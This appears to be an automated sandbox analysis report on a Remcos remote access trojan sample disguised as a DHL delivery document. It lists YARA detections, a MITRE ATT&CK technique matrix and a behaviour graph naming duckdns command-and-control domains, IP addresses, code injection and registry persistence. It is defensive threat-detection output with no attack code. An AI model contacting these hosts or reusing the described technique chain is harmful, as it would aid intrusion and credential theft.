              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		1
              Scripting              		312
              Process Injection              		1
              Masquerading              		OS Credential Dumping111
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Registry Run Keys / Startup Folder              		1
              Modify Registry              		LSASS Memory2
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		141
              Virtualization/Sandbox Evasion              		Security Account Manager141
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture113
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632026 Sample: awb_post_dhl_delivery_docum... Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 35 ortain7histas4.duckdns.org 2->35 37 ortain7histas3.duckdns.org 2->37 39 3 other IPs or domains 2->39 49 Suricata IDS alerts for network traffic 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 57 6 other signatures 2->57 9 powershell.exe 15 2->9         started        12 cmd.exe 1 2->12         started        signatures3 55 Uses dynamic DNS services 37->55 process4 signatures5 59 Early bird code injection technique detected 9->59 61 Writes to foreign memory regions 9->61 63 Found suspicious powershell code related to unpacking or dynamic code loading 9->63 67 2 other signatures 9->67 14 msiexec.exe 6 8 9->14         started        19 conhost.exe 9->19         started        65 Suspicious powershell command line found 12->65 21 powershell.exe 14 23 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 41 ortain7histas1.duckdns.org 192.169.69.26, 49722, 49723, 49724 WOWUS United States 14->41 33 C:\Users\user\AppData\Roaming\hsGaonspt.dat, data 14->33 dropped 45 Hides threads from debuggers 14->45 25 cmd.exe 1 14->25         started        43 planachiever.au 27.124.114.163, 443, 49719, 49721 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 21->43 47 Found suspicious powershell code related to unpacking or dynamic code loading 21->47 27 conhost.exe 21->27         started        file8 signatures9 process10 process11 29 conhost.exe 25->29         started        31 reg.exe 1 1 25->31         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.